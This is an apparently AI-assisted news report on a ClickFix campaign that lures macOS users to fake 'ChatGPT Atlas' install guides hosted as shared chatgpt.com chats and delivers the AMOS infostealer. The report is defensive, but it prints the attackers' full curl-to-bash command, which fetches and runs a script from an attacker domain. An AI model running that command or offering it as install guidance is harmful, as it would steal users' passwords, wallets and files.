Tuesday, August 11, 2026
LIVEThe Unrelenting Cyber Battle: Hacking Threats and the Imperative of Robust Data Protection///Navigating the Cyber Labyrinth: Bolstering Defenses Against Evolving Hacking Threats///The Dual Front War: Battling Hacking and Bolstering Data Protection in the Digital Age///The Ever-Evolving Cyber Threat Landscape: Navigating Hacking and Fortifying Data Protection///The Unseen Battle: Fortifying Data in an Age of Relentless Hacking///The Unseen War: Hacking's Relentless Advance and the Imperative of Data Protection///The Evolving Threat Landscape: Hacking, Data Protection, and the Imperative for Proactive Security///Navigating the Digital Minefield: Bolstering Data Protection in an Era of Relentless Hacking///The Dual Fronts of Digital Defense: Combating Hacking and Fortifying Data Protection///Hacking's New Frontier: Fortifying Data Protection in the Age of Advanced Cyber Threats///The Dual Front: Navigating Hacking Threats and Fortifying Data Protection in the Digital Age///Navigating the Digital Gauntlet: The Evolving Nexus of Hacking and Data Protection///The Unrelenting Cyber Battle: Hacking Threats and the Imperative of Robust Data Protection///Navigating the Cyber Labyrinth: Bolstering Defenses Against Evolving Hacking Threats///The Dual Front War: Battling Hacking and Bolstering Data Protection in the Digital Age///The Ever-Evolving Cyber Threat Landscape: Navigating Hacking and Fortifying Data Protection///The Unseen Battle: Fortifying Data in an Age of Relentless Hacking///The Unseen War: Hacking's Relentless Advance and the Imperative of Data Protection///The Evolving Threat Landscape: Hacking, Data Protection, and the Imperative for Proactive Security///Navigating the Digital Minefield: Bolstering Data Protection in an Era of Relentless Hacking///The Dual Fronts of Digital Defense: Combating Hacking and Fortifying Data Protection///Hacking's New Frontier: Fortifying Data Protection in the Age of Advanced Cyber Threats///The Dual Front: Navigating Hacking Threats and Fortifying Data Protection in the Digital Age///Navigating the Digital Gauntlet: The Evolving Nexus of Hacking and Data Protection///
Subscribe
Cyber Security
Independent · Digital
Thehackingpost
CybersecurityAI-assisted

New ClickFix Attacks as macOS Infostealer Leverages Official ChatGPT Website by Piggybacking

A new cybersecurity threat has been identified targeting macOS users through a malicious campaign exploiting the official ChatGPT website. The attackers employ a technique known as ClickFix to distribute the AMOS infostealer by posting deceptive…

A new cybersecurity threat has been identified targeting macOS users through a malicious campaign exploiting the official ChatGPT website. The attackers employ a technique known as ClickFix to distribute the AMOS infostealer by posting deceptive installation guides on the chatgpt.com domain.

This campaign exploits ChatGPT's chat-sharing feature, allowing users to create and share public conversations via links that seem to originate from OpenAI's official site. The attack initiates through paid search advertisements on Google. Users searching for "chatgpt atlas" may encounter sponsored links that misleadingly appear to direct them to the official ChatGPT domain.

The advertisement title, "ChatGPT™ Atlas for macOS – Download ChatGPT Atlas for Mac," lends authenticity to the malicious link. Upon clicking, users are directed to a shared ChatGPT conversation containing false installation instructions for a fictitious Atlas browser.

The fraudulent guide instructs users to open the Terminal application on their Mac and execute a specific command:

A new cybersecurity threat has been identified targeting macOS users through a malicious campaign exploiting the official ChatGPT website.
Emily Carter · Thehackingpost

/bin/bash -c "$(curl -fsSL 'https://atlas-extension.com/gt')"

This command retrieves a malicious script from the attacker's server at atlas-extension.com and executes it on the user's device. The script prompts for the system password, continuously requesting it until correctly entered. Once acquired, the script installs the AMOS infostealer using the credentials.

Advertisement

AMOS is capable of extracting passwords, cookies, and browser data from Chrome and Firefox. It also targets cryptocurrency wallet information from applications like Electrum, Coinomi, and Exodus. Additionally, it collects files with TXT, PDF, and DOCX extensions from folders such as Desktop, Documents, and Downloads. A backdoor is installed for persistent remote access to the infected system.

Based on reporting by Cyber Security News.

AI transparency. This article was produced with the assistance of artificial intelligence and published under human editorial oversight. AI systems can make mistakes. Read how we use AI (EU AI Act, Art. 50).
Related Stories